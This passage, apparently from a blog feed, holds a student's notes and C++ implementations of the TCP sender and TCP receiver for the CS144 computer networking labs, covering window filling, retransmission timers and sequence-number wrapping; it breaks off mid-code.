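TCPSender state transition diagram</h3><p>No new state variables are needed: the current state can be determined quickly from what the existing public interfaces report.</p><p><img src="/2021/11/cs144-lab3/image-20211109080457029.png" alt="image-20211109080457029"></p><h2 id="四、TCPSender-实现">IV. TCPSender implementation</h2><p>There are a few pitfalls in the implementation:</p><ul><li><p>When SYN is set, the payload should carry one byte less than it otherwise could, because SYN occupies one sequence number in the window.</p><p>If the payload fills the segment so that FIN no longer fits, FIN must go in the next segment.</p></li><li><p>A FIN may be sent only when three conditions hold:</p><ul><li><strong>No FIN has been sent before</strong>. This stops the sender from repeatedly filling the window with FIN segments after it has sent a FIN and received its ack.</li><li>The input byte stream has reached EOF.</li><li>After subtracting the payload size, the window still has room for FIN.</li></ul></li><li><p>While filling the window in a loop, stop as soon as there is nothing left to send locally, even if the window still has room.</p><p>If the current segment carries FIN, stop filling the window right after sending it.</p></li><li><p>The retransmission timer tracks the time elapsed <strong>since the sender last received a new ack</strong>, not a separate timeout for each in-flight segment. So apart from the SYN, which starts the timer, sending a segment while others are still in flight does not reset the retransmission timer, and there is no need for one timer per segment.</p><p>Likewise, the timer is reset only after <strong>a new segment has been acknowledged by the receiver</strong>.</p><p>tick behaves similarly: the retransmission timer only matters while some segment is in flight. When it expires, the segment retransmitted is the <strong>unacknowledged segment with the smallest seqno</strong>.</p></li><li><p>When the receiver's window size is 0, still treat it as 1 and send one byte of data. But if the remote side sends no ack, <strong>do not double the RTO</strong>; keep the previous RTO.</p></li></ul><p>Here is my implementation:</p><p>Class declaration:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">TCPSender</span> &#123;</span><br><span class="line">  <span class="keyword">private</span>:</span><br><span class="line">    <span 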
class="type">int</span> _timeout&#123;<span class="number">-1</span>&#125;;</span><br><span class="line">    <span class="type">int</span> _timecount&#123;<span class="number">0</span>&#125;;</span><br><span class="line"></span><br><span class="line">    std::map&lt;<span class="type">size_t</span>, TCPSegment&gt; _outgoing_map&#123;&#125;;</span><br><span class="line">    <span class="type">size_t</span> _outgoing_bytes&#123;<span class="number">0</span>&#125;;</span><br><span class="line"></span><br><span class="line">    <span class="type">size_t</span> _last_window_size&#123;<span class="number">1</span>&#125;;</span><br><span class="line">    <span class="type">bool</span> _set_syn_flag&#123;<span class="literal">false</span>&#125;;</span><br><span class="line">    <span class="type">bool</span> _set_fin_flag&#123;<span class="literal">false</span>&#125;;</span><br><span class="line">    <span class="type">size_t</span> _consecutive_retransmissions_count&#123;<span class="number">0</span>&#125;;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! 
our initial sequence number, the number for our SYN.</span></span><br><span class="line">    WrappingInt32 _isn;</span><br><span class="line"></span><br><span class="line">    [...]</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>Method implementations:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span 
class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span 
class="type">uint64_t</span> <span class="title">TCPSender::bytes_in_flight</span><span class="params">()</span> <span class="type">const</span> </span>&#123; <span class="keyword">return</span> _outgoing_bytes; &#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">TCPSender::fill_window</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="comment">// If the remote window size is 0, treat it as 1</span></span><br><span class="line">    <span class="type">size_t</span> curr_window_size = _last_window_size ? _last_window_size : <span class="number">1</span>;</span><br><span class="line">    <span class="comment">// Fill the window in a loop</span></span><br><span class="line">    <span class="keyword">while</span> (curr_window_size &gt; _outgoing_bytes) &#123;</span><br><span class="line">        <span class="comment">// Try to build one segment</span></span><br><span class="line">        <span class="comment">// If SYN has not been sent yet, send it now</span></span><br><span class="line">        TCPSegment segment;</span><br><span class="line">        <span class="keyword">if</span> (!_set_syn_flag) &#123;</span><br><span class="line">            segment.<span class="built_in">header</span>().syn = <span class="literal">true</span>;</span><br><span class="line">            _set_syn_flag = <span class="literal">true</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// Set seqno</span></span><br><span class="line">        segment.<span class="built_in">header</span>().seqno = <span class="built_in">next_seqno</span>();</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Load the payload.</span></span><br><span class="line">        <span class="type">const</span> <span class="type">size_t</span> payload_size =</span><br><span class="line">            <span class="built_in">min</span>(TCPConfig::MAX_PAYLOAD_SIZE, 
curr_window_size - _outgoing_bytes - segment.<span class="built_in">header</span>().syn);</span><br><span class="line">        string payload = _stream.<span class="built_in">read</span>(payload_size);</span><br><span class="line"></span><br><span class="line">        <span class="comment">/**</span></span><br><span class="line"><span class="comment">         * After reading, add FIN if all of the following hold:</span></span><br><span class="line"><span class="comment">         *  1. No FIN has been sent before</span></span><br><span class="line"><span class="comment">         *  2. The input byte stream has reached EOF</span></span><br><span class="line"><span class="comment">         *  3. After subtracting the payload (and SYN, if set), the window still has room for FIN</span></span><br><span class="line"><span class="comment">         */</span></span><br><span class="line">        <span class="keyword">if</span> (!_set_fin_flag &amp;&amp; _stream.<span class="built_in">eof</span>() &amp;&amp; payload.<span class="built_in">size</span>() + _outgoing_bytes + segment.<span class="built_in">header</span>().syn &lt; curr_window_size)</span><br><span class="line">            _set_fin_flag = segment.<span class="built_in">header</span>().fin = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line">        segment.<span class="built_in">payload</span>() = <span class="built_in">Buffer</span>(<span class="built_in">move</span>(payload));</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Stop sending if the segment carries nothing</span></span><br><span class="line">        <span class="keyword">if</span> (segment.<span class="built_in">length_in_sequence_space</span>() == <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// If no segment is in flight, (re)start the retransmission timer</span></span><br><span class="line">        <span class="keyword">if</span> (_outgoing_map.<span class="built_in">empty</span>()) &#123;</span><br><span class="line">            _timeout = 
_initial_retransmission_timeout;</span><br><span class="line">            _timecount = <span class="number">0</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Send</span></span><br><span class="line">        _segments_out.<span class="built_in">push</span>(segment);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Track the segment</span></span><br><span class="line">        _outgoing_bytes += segment.<span class="built_in">length_in_sequence_space</span>();</span><br><span class="line">        _outgoing_map.<span class="built_in">insert</span>(<span class="built_in">make_pair</span>(_next_seqno, segment));</span><br><span class="line">        <span class="comment">// Advance the next absolute seqno to send</span></span><br><span class="line">        _next_seqno += segment.<span class="built_in">length_in_sequence_space</span>();</span><br><span class="line"></span><br><span class="line">        <span class="comment">// If FIN was set, stop filling the window</span></span><br><span class="line">        <span class="keyword">if</span> (segment.<span class="built_in">header</span>().fin)</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//! \param ackno The remote receiver&#x27;s ackno (acknowledgment number)</span></span><br><span class="line"><span class="comment">//! 
\param window_size The remote receiver&#x27;s advertised window size</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">TCPSender::ack_received</span><span class="params">(<span class="type">const</span> WrappingInt32 ackno, <span class="type">const</span> <span class="type">uint16_t</span> window_size)</span> </span>&#123;</span><br><span class="line">    <span class="type">size_t</span> abs_seqno = <span class="built_in">unwrap</span>(ackno, _isn, _next_seqno);</span><br><span class="line">    <span class="comment">// Discard the ack if it is not credible (it acknowledges data not yet sent)</span></span><br><span class="line">    <span class="keyword">if</span> (abs_seqno &gt; _next_seqno)</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    <span class="comment">// Walk the map and drop segments that have been fully acknowledged</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">auto</span> iter = _outgoing_map.<span class="built_in">begin</span>(); iter != _outgoing_map.<span class="built_in">end</span>();) &#123;</span><br><span class="line">        <span class="comment">// Check whether this segment has been received in full</span></span><br><span class="line">        <span class="type">const</span> TCPSegment &amp;seg = iter-&gt;second;</span><br><span class="line">        <span class="keyword">if</span> (iter-&gt;first + seg.<span class="built_in">length_in_sequence_space</span>() &lt;= abs_seqno) &#123;</span><br><span class="line">            _outgoing_bytes -= seg.<span class="built_in">length_in_sequence_space</span>();</span><br><span class="line">            iter = _outgoing_map.<span class="built_in">erase</span>(iter);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// A new segment was acknowledged: reset the RTO and the timer</span></span><br><span class="line">            _timeout = _initial_retransmission_timeout;</span><br><span class="line">            _timecount = <span class="number">0</span>;</span><br><span 
class="line">        &#125;</span><br><span class="line">        <span class="comment">// This segment is not yet acknowledged, so neither are the later ones: stop scanning</span></span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    _consecutive_retransmissions_count = <span class="number">0</span>;</span><br><span class="line">    <span class="comment">// Fill the window with more data</span></span><br><span class="line">    _last_window_size = window_size;</span><br><span class="line">    <span class="built_in">fill_window</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//! \param[in] ms_since_last_tick the number of milliseconds since the last call to this method</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">TCPSender::tick</span><span class="params">(<span class="type">const</span> <span class="type">size_t</span> ms_since_last_tick)</span> </span>&#123;</span><br><span class="line">    _timecount += ms_since_last_tick;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">auto</span> iter = _outgoing_map.<span class="built_in">begin</span>();</span><br><span class="line">    <span class="comment">// A segment is in flight and the timer has expired</span></span><br><span class="line">    <span class="keyword">if</span> (iter != _outgoing_map.<span class="built_in">end</span>() &amp;&amp; _timecount &gt;= _timeout) &#123;</span><br><span class="line">        <span class="comment">// A timeout with a nonzero window suggests network congestion</span></span><br><span class="line">        <span class="keyword">if</span> (_last_window_size &gt; <span class="number">0</span>)</span><br><span class="line">            _timeout *= <span class="number">2</span>;</span><br><span class="line">        _timecount = <span class="number">0</span>;</span><br><span 
class="line">        _segments_out.<span class="built_in">push</span>(iter-&gt;second);</span><br><span class="line">        <span class="comment">// Increment the consecutive-retransmission counter</span></span><br><span class="line">        ++_consecutive_retransmissions_count;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">unsigned</span> <span class="type">int</span> <span class="title">TCPSender::consecutive_retransmissions</span><span class="params">()</span> <span class="type">const</span> </span>&#123; <span class="keyword">return</span> _consecutive_retransmissions_count; &#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">TCPSender::send_empty_segment</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    TCPSegment segment;</span><br><span class="line">    segment.<span class="built_in">header</span>().seqno = <span class="built_in">next_seqno</span>();</span><br><span class="line">    _segments_out.<span class="built_in">push</span>(segment);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;These are my notes on CS144 Computer Networking Lab3: the TCP sender implementation, TCPSender.&lt;/p&gt;
&lt;p&gt;CS144 Lab3 handout: &lt;a href=&quot;https://cs144.github.io/assignments/lab3.pdf&quot;&gt;Lab Checkpoint 3: the TCP sender&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;My CS144 lab repository: &lt;a href=&quot;https://github.com/Kiprey/sponge&quot;&gt;github&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    
    <category term="计算机网络" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"/>
    
    <category term="CS144" scheme="https://kiprey.github.io/tags/CS144/"/>
    
  </entry>
  
  <entry>
    <title>CS144 Computer Networking Lab2</title>
    <link href="https://kiprey.github.io/2021/11/cs144-lab2/"/>
    <id>https://kiprey.github.io/2021/11/cs144-lab2/</id>
    <published>2021-11-06T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.910Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>These are my notes on CS144 Computer Networking Lab2: the TCP receiver implementation, TCPReceiver.</p><p>CS144 Lab2 handout: <a href="https://cs144.github.io/assignments/lab2.pdf">Lab Checkpoint 2: the TCP receiver</a></p><p>My CS144 lab repository: <a href="https://github.com/Kiprey/sponge">github</a></p><span id="more"></span><h2 id="二、环境配置">II. Environment setup</h2><p>Our lab code currently lives on the <code>master</code> branch, and some starter code has to be merged in before working on the lab, so run:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git merge origin/lab2-startercode</span><br></pre></td></tr></table></figure><p>Then rebuild with make.</p><h2 id="三、TCPReceiver-简述">III. TCPReceiver overview</h2><p>In Lab2 we implement a TCPReceiver, which receives incoming TCP segments and turns them into a byte stream the user can read.</p><p>Besides writing incoming data into the ByteStream, TCPReceiver also has to <strong>tell the sender two things</strong>:</p><ul><li>The index of the first unassembled byte, called the <strong>acknowledgment number (ackno)</strong>. This is the first byte the receiver still needs.</li><li>The distance between <strong>the first unassembled byte index</strong> and <strong>the first unacceptable byte index</strong>, called the <strong>window size</strong>.</li></ul><p>Together, ackno and window size describe the receiver's current <strong>receive window</strong>: the range of indexes the sender is allowed to send. A TCP receiver typically uses this window for <strong>flow control</strong>, limiting how much the sender may send.</p><p>In short, the TCPReceiver we implement has to:</p><ul><li>Receive TCP segments</li><li>Reassemble the byte stream (including EOF)</li><li>Determine the signals to send back to the sender for acknowledgment and flow control</li></ul><h2 id="四、索引转换">IV. Index conversion</h2><p>The field in a TCP segment that gives the <strong>index of the first byte of its data (the sequence number, seqno)</strong> is 32 bits wide, which adds a few things to take care of:</p><ul><li><p>A 32-bit seqno can index at most 4 GiB of data, so it can overflow. When it does, the seqno of the next byte wraps around to 0.</p></li><li><p>For security, and to avoid confusion with segments from earlier connections, TCP tries to make seqnos hard to guess and unlikely to repeat. So a TCP seqno does not start at 0 but at a random 32-bit number, the <strong>initial sequence number (ISN)</strong>.</p><p>The ISN is the sequence number of the SYN, which marks the beginning of the TCP stream.</p></li><li><p>The <strong>logical beginning</strong> and <strong>logical end</strong> of a TCP stream each occupy one seqno. Besides making sure <strong>every byte of data is received</strong>, TCP also has to make sure <strong>the beginning and end of the stream</strong> are received. So the SYN (beginning of stream) and FIN (end of stream) control flags are each assigned a sequence number (the one occupied by SYN is the ISN).</p><p>Each data byte in the stream also occupies one sequence number.</p><p>Note, however, that SYN and FIN are not part of the stream itself and are not data bytes. They only mark the beginning and end of the byte stream.</p></li></ul><p>With this many kinds of index it is easy to get confused. There are three in total:</p><ul><li>Sequence number (seqno): <strong>starts at the ISN</strong>, includes SYN and FIN, <strong>32 bits, wrapping</strong>.</li><li>Absolute sequence number (absolute seqno): <strong>starts at 0</strong>, includes SYN and FIN, <strong>64 bits, non-wrapping</strong>.</li><li>Stream index: <strong>starts at 0</strong>, <strong>excludes SYN and FIN</strong>, <strong>64 bits, non-wrapping</strong>.</li></ul><p>Here is a simple example that distinguishes the three:</p><p><img src="/2021/11/cs144-lab2/image-20211107105751818.png" alt="image-20211107105751818"></p><p>Converting between sequence numbers and <strong>absolute</strong> sequence numbers is slightly awkward, because sequence numbers <strong>wrap around</strong>. In this lab CS144 represents sequence numbers with a custom type, WrappingInt32, with conversions to and from absolute sequence numbers.</p><blockquote><p>But we have to implement those ourselves; there is no free lunch (lol).</p></blockquote><p>The implementation is a little fiddly, and it is best to avoid loops and keep conditionals to a minimum for efficiency.</p><p>My implementation is shown below, with the details written as comments in the code:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//! 
Transform an &quot;absolute&quot; 64-bit sequence number (zero-indexed) into a WrappingInt32</span></span><br><span class="line"><span class="comment">//! \param n The input absolute 64-bit sequence number</span></span><br><span class="line"><span class="comment">//! \param isn The initial sequence number</span></span><br><span class="line"><span class="function">WrappingInt32 <span class="title">wrap</span><span class="params">(<span class="type">uint64_t</span> n, WrappingInt32 isn)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> WrappingInt32&#123;isn + <span class="built_in">static_cast</span>&lt;<span class="type">uint32_t</span>&gt;(n)&#125;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//! Transform a WrappingInt32 into an &quot;absolute&quot; 64-bit sequence number (zero-indexed)</span></span><br><span class="line"><span class="comment">//! \param n The relative sequence number</span></span><br><span class="line"><span class="comment">//! \param isn The initial sequence number</span></span><br><span class="line"><span class="comment">//! \param checkpoint A recent absolute 64-bit sequence number</span></span><br><span class="line"><span class="comment">//! \returns the 64-bit sequence number that wraps to `n` and is closest to `checkpoint`</span></span><br><span class="line"><span class="comment">//!</span></span><br><span class="line"><span class="comment">//! \note Each of the two streams of the TCP connection has its own ISN. One stream</span></span><br><span class="line"><span class="comment">//! runs from the local TCPSender to the remote TCPReceiver and has one ISN,</span></span><br><span class="line"><span class="comment">//! and the other stream runs from the remote TCPSender to the local TCPReceiver and</span></span><br><span class="line"><span class="comment">//! 
has a different ISN.</span></span><br><span class="line"><span class="function"><span class="type">uint64_t</span> <span class="title">unwrap</span><span class="params">(WrappingInt32 n, WrappingInt32 isn, <span class="type">uint64_t</span> checkpoint)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// Size of the 32-bit range (2^32)</span></span><br><span class="line">    <span class="keyword">constexpr</span> <span class="type">uint64_t</span> INT32_RANGE = <span class="number">1ull</span> &lt;&lt; <span class="number">32</span>;</span><br><span class="line">    <span class="comment">// Offset of n from isn (mod 2^32)</span></span><br><span class="line">    <span class="comment">// The real absolute seqno satisfies: absolute seqno % INT32_RANGE == offset</span></span><br><span class="line">    <span class="type">uint32_t</span> offset = n - isn;</span><br><span class="line">    <span class="comment">/// <span class="doctag">NOTE:</span> The biggest pitfall! If checkpoint is greater than offset, round to the nearest wrap</span></span><br><span class="line">    <span class="comment">/// <span class="doctag">NOTE:</span> However!!! 
If checkpoint is not greater than offset, we can only round up, i.e. offset itself is the abs seqno</span></span><br><span class="line">    <span class="keyword">if</span>(checkpoint &gt; offset) &#123;</span><br><span class="line">        <span class="comment">// Adding half of INT32_RANGE makes the division round to the nearest wrap</span></span><br><span class="line">        <span class="type">uint64_t</span> real_checkpoint = (checkpoint - offset) + (INT32_RANGE &gt;&gt; <span class="number">1</span>);</span><br><span class="line">        <span class="type">uint64_t</span> wrap_num = real_checkpoint / INT32_RANGE;</span><br><span class="line">        <span class="keyword">return</span> wrap_num * INT32_RANGE + offset;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">       <span class="keyword">return</span> offset;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="四、TCPReceiver-实现">IV. TCPReceiver Implementation</h2><h3 id="1-要求">1. Requirements</h3><p>The following member functions need to be implemented:</p><ul><li><p><code>segment_received()</code>: called every time a TCP segment is received. It needs to:</p><ul><li><p>Set the ISN if the segment carries the SYN flag.</p><p>Note: SYN and FIN segments <strong>can still carry user data</strong>. Also, <strong>a single segment may have both the SYN flag and the FIN flag set</strong>.</p></li><li><p>Push the received data into the stream reassembler, and end the input once a FIN segment has been received.</p></li></ul></li><li><p><code>ackno()</code>: returns <strong>the index of the first byte the receiver has not yet received</strong>. If the ISN has not been set yet, it returns an empty optional.</p></li><li><p><code>window_size()</code>: returns the size of the receive window, i.e. the distance between <strong>the first unassembled index</strong> and <strong>the first unacceptable index</strong>.</p></li></ul><p>This is the state flow that CS144 expects from the TCP receiver:</p><p><img src="/2021/11/cs144-lab2/image-20211107122822566.png" alt="image-20211107122822566"></p><h3 id="2-具体实现">2. 
Implementation</h3><h4 id="思路">Approach</h4><p>Apart from the error state, TCPReceiver has three states:</p><ul><li>LISTEN: waiting for the SYN segment. Any data that arrives before the SYN <strong>must be discarded</strong>.</li><li>SYN_RECV: the SYN segment has arrived, and data segments can be received normally.</li><li>FIN_RECV: the FIN segment has arrived, and input to the ByteStream must be ended.</li></ul><p>Each time TCPReceiver receives a segment, how do we know which state the receiver is in? A quick check:</p><ul><li>If the ISN has not been set yet, the state must be LISTEN.</li><li>If ByteStream.input_ended() is true, the state must be FIN_RECV.</li><li>Otherwise, the state is SYN_RECV.</li></ul><p>The window size is the capacity minus the number of bytes still unread in the ByteStream, i.e. the index range of not-yet-assembled substrings that the reassembler is able to store.</p><p>The ackno calculation must take the SYN and FIN flags into account, because each of them occupies one seqno. So when returning the ackno, check which state the receiver is in and, depending on that state, add 1 or 2 to the computed value. The same rule applies when calling push_substring.</p><h4 id="源码实现">Source Code</h4><p>Class declaration:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">TCPReceiver</span> &#123;</span><br><span class="line">    WrappingInt32 _isn;</span><br><span class="line">    <span class="type">bool</span> _set_syn_flag;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! Our data structure for re-assembling bytes.</span></span><br><span class="line">    StreamReassembler _reassembler;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! 
The maximum number of bytes we&#x27;ll store.</span></span><br><span class="line">    <span class="type">size_t</span> _capacity;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">public</span>:</span><br><span class="line">    ...</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>Method implementations:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> *  \brief TCPReceiver has roughly three states:</span></span><br><span class="line"><span class="comment"> *      1. 
LISTEN: the SYN has not arrived yet. Checked via the _set_syn_flag flag</span></span><br><span class="line"><span class="comment"> *      2. SYN_RECV: the SYN has arrived. Identified only by ruling out states 1 and 3</span></span><br><span class="line"><span class="comment"> *      3. FIN_RECV: the FIN has arrived. Checked via ByteStream input_ended()</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">TCPReceiver::segment_received</span><span class="params">(<span class="type">const</span> TCPSegment &amp;seg)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// Check whether this is the SYN segment</span></span><br><span class="line">    <span class="type">const</span> TCPHeader &amp;header = seg.<span class="built_in">header</span>();</span><br><span class="line">    <span class="keyword">if</span> (!_set_syn_flag) &#123;</span><br><span class="line">        <span class="comment">// Every segment that arrives before the SYN must be discarded</span></span><br><span class="line">        <span class="keyword">if</span> (!header.syn)</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        _isn = header.seqno;</span><br><span class="line">        _set_syn_flag = <span class="literal">true</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="type">uint64_t</span> abs_ackno = _reassembler.<span class="built_in">stream_out</span>().<span class="built_in">bytes_written</span>() + <span class="number">1</span>;</span><br><span class="line">    <span class="type">uint64_t</span> curr_abs_seqno = <span class="built_in">unwrap</span>(header.seqno, _isn, abs_ackno);</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! <span class="doctag">NOTE:</span> the payload of a SYN segment must not be dropped</span></span><br><span class="line">    <span class="comment">//! 
<span class="doctag">NOTE:</span> the reassembler is robust enough that no seqno filtering is needed here</span></span><br><span class="line">    <span class="type">uint64_t</span> stream_index = curr_abs_seqno - <span class="number">1</span> + (header.syn);</span><br><span class="line">    _reassembler.<span class="built_in">push_substring</span>(seg.<span class="built_in">payload</span>().<span class="built_in">copy</span>(), stream_index, header.fin);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function">optional&lt;WrappingInt32&gt; <span class="title">TCPReceiver::ackno</span><span class="params">()</span> <span class="type">const</span> </span>&#123;</span><br><span class="line">    <span class="comment">// Check whether we are still in the LISTEN state</span></span><br><span class="line">    <span class="keyword">if</span> (!_set_syn_flag)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nullopt</span>;</span><br><span class="line">    <span class="comment">// Outside LISTEN, the ackno also counts the one seqno taken by the SYN flag</span></span><br><span class="line">    <span class="type">uint64_t</span> abs_ack_no = _reassembler.<span class="built_in">stream_out</span>().<span class="built_in">bytes_written</span>() + <span class="number">1</span>;</span><br><span class="line">    <span class="comment">// In the FIN_RECV state, also count the one seqno taken by the FIN flag</span></span><br><span class="line">    <span class="keyword">if</span> (_reassembler.<span class="built_in">stream_out</span>().<span class="built_in">input_ended</span>())</span><br><span class="line">        ++abs_ack_no;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">WrappingInt32</span>(_isn) + abs_ack_no;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">size_t</span> <span class="title">TCPReceiver::window_size</span><span class="params">()</span> <span 
